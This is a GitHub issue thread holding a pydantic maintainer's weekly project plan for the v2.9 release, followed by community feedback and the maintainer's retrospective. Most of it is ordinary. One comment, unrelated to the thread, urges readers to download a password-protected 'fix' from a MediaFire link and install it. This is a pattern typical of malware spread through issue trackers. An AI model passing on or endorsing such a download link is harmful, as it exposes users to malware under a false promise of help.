### ISSUE TITLE
pydantic weekly project plan (Sydney Runkle) - August 26th, 2024

### ISSUE THREAD

**Issue by sydney-runkle** [pydantic/pydantic#10236]
## Background

Following on the heels of #10055, I'm going to continue with this public weekly plan approach.

The motivation behind tickets like these is to:

1. Communicate and coordinate with the community
2. Summarize and track weekly developments in `pydantic`
3. Help me / our team organize and prioritize issues

## Last Week's Highlights

* https://github.com/pydantic/pydantic/pull/10029
* https://github.com/pydantic/pydantic/pull/10030
* https://github.com/pydantic/pydantic/pull/10064
* https://github.com/pydantic/pydantic/pull/10181
* https://github.com/pydantic/pydantic/pull/10157
* https://github.com/pydantic/pydantic/pull/10158

## My plans for this week

I'll be focusing primarily on our v2.9 release, which mostly involves docs updates this week. The v2.9 issue below outlines most of the rest of the TODOs on that front.

I'll also be doing some tidying of our `pydantic-core` repo - closing stale PRs, etc. Triaged issues last week. I'd like to open a PR / day this week with a minor fix / improvement to keep regularly improving my comfort with `rust`.

### Definitely:

- [ ] https://github.com/pydantic/pydantic/issues/10189
- [x] https://github.com/pydantic/pydantic-core/issues/1389
- [x] https://github.com/pydantic/pydantic/issues/7252

Potentially:

- [ ] https://github.com/pydantic/pydantic/issues/7353

### PRs in progress

* https://github.com/pydantic/pydantic-core/pull/1424
* https://github.com/pydantic/pydantic-core/pull/1421
* https://github.com/pydantic/pydantic-core/pull/1420
* https://github.com/pydantic/pydantic/pull/10277
* https://github.com/pydantic/pydantic/pull/10276
* https://github.com/pydantic/pydantic/pull/10268
* https://github.com/pydantic/pydantic/pull/10267
* https://github.com/pydantic/pydantic/pull/10261
* https://github.com/pydantic/pydantic/pull/10261
* https://github.com/pydantic/pydantic/pull/10257
* https://github.com/pydantic/pydantic/pull/10255
* https://github.com/pydantic/pydantic/pull/10247
* https://github.com/pydantic/pydantic/pull/10245
* https://github.com/pydantic/pydantic/pull/10244

### `pydantic`

- [ ] https://github.com/pydantic/pydantic/pull/10100
- [x] https://github.com/pydantic/pydantic/pull/10231

### `pydantic-core`

- [ ] https://github.com/pydantic/pydantic-core/pull/1419
- [ ] https://github.com/pydantic/pydantic-core/pull/1413
- [ ] https://github.com/pydantic/pydantic-core/pull/1401
- [ ] https://github.com/pydantic/pydantic-core/pull/1399
- [ ] https://github.com/pydantic/pydantic-core/pull/1369
- [ ] https://github.com/pydantic/pydantic-core/pull/1359

## Feedback

I'd love to get some feedback from the community / other contributors here. What else would be helpful for you to see on weekly reports like these?

Other sections I think could be valuable:
* high priority issues
* good first issues

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Youssefares** [comment]
High priority issues and good first issues would be great! https://github.com/pydantic/pydantic/issues/9102 has offered great guidance for picking up new work.

**Comment by sydney-runkle** [comment]
Sure thing! I've got a big planning session coming up for v2.10, so I'll create a new / updated list when I do that!

**Comment by sydney-runkle** [comment]
My general summary for this week, in hindsight:
* Great progress on the `pydantic-core` docs
* I'm excited that we released the beta early this week.
* I certainly didn't follow up entirely on reviews on the `pydantic-core` end - I'll plan to dedicate some significant time to that next week.
* I learned a lot more about our namespace management and performance consequences of temporary allocations, especially in the context of new dict creation and coping.
* I put off docs updates until the end of the week, which didn't pair well with a twisty road 8 hour drive... will avoid that in the future 🤢 

In upcoming weeks, I'd like to explore holding myself to a checklist like:
- [ ] `pydantic` bug fix
- [ ] `pydantic-core` bug fix
- [ ] performance related improvement
- [ ] `pydantic` feature (or at least, feature work)
- [ ] documentation improvement

I certainly want to dig in further to some / many of these categories each week, but it could be interesting to try to check most boxes on a weekly basis.

Additionally, I think it would be beneficial for me to alot specific time for reviews (like `pydantic-core` PRs), so that happens more consistently.

**Comment by sydney-runkle** [comment]
Closing as resolved, will be sure to work on that v2.10 issue with priority issues in the next few days 👍
